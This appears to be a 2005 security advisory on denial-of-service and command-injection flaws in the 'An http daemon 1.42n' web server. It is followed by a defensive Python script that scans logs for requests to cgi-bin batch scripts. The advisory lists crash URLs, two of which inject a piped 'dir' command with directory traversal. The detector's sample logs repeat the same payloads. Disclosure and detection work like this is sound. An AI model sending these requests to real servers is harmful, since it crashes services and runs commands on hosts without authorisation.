An httpd daemon 1.42n denial of service and privilege escalation

2 May 2005

Description:

Some vulnerabilities have been identified in An http daemon 1.42n that may allow a remote malicious user to perform denial of service attacks.

Issue 1:

The first vulnerability is a denial of service attack that can be used to crash An http daemon. The server comes with a number of scripts, but these scripts can be used for DoS. The URLs below will crash the server:

http://[host]/cgi-bin/test.bat?
http://[host]/cgi-bin/input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
http://[host]//cgi-bin/input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\

Credit:

Dr_insane
dr_insane(at)pathfinder.gr
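
A log check a defender could run for the request patterns in Issue 1, added here as an example and not part of the original advisory. The Common Log Format input, the sample log lines and the function names are assumptions.

```python
import re
from urllib.parse import unquote

# Request line inside a Common Log Format entry (the log format is an assumption).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Characters cmd.exe treats as command separators or redirection.
SHELL_META = set("|&<>^")

def classify_request(target):
    """Return a reason if the request hits a cgi-bin batch script, else None."""
    # Split by hand: urlsplit() would read a leading "//cgi-bin" as a host name.
    raw_path, sep, raw_query = target.partition("?")
    # Decode, collapse duplicate slashes and fold case before matching the path.
    path = re.sub(r"/{2,}", "/", unquote(raw_path)).lower()
    if not (path.startswith("/cgi-bin/") and path.endswith(".bat")):
        return None
    query = unquote(raw_query)
    if SHELL_META & set(query):
        return "shell metacharacter in query to batch script"
    if sep and query == "":
        return "empty query to batch script"
    return "batch script request"

def scan_log(lines):
    """Return (line_number, reason) for every flagged log line."""
    findings = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        reason = classify_request(match.group(1)) if match else None
        if reason:
            findings.append((number, reason))
    return findings

# Constructed sample log lines (documentation addresses, shortened paths).
SAMPLE_LOG = [
    r'192.0.2.10 - - [02/May/2005:10:00:01 +0000] "GET /index.html HTTP/1.0" 200 512',
    r'192.0.2.11 - - [02/May/2005:10:00:05 +0000] "GET /cgi-bin/test.bat? HTTP/1.0" 200 0',
    r'192.0.2.11 - - [02/May/2005:10:00:09 +0000] "GET /cgi-bin/input2.bat?|dir%20..\\..\\ HTTP/1.0" 200 0',
    r'192.0.2.11 - - [02/May/2005:10:00:12 +0000] "GET //CGI-BIN/input.bat?%7Cdir HTTP/1.0" 200 0',
    r'192.0.2.12 - - [02/May/2005:10:00:20 +0000] "GET /cgi-bin/report.bat?id=7 HTTP/1.0" 200 90',
]

if __name__ == "__main__":
    for number, reason in scan_log(SAMPLE_LOG):
        print(f"line {number}: {reason}")
```

Any hit on a batch script under cgi-bin is worth reviewing, since the advisory's crash requests target the scripts shipped with the server.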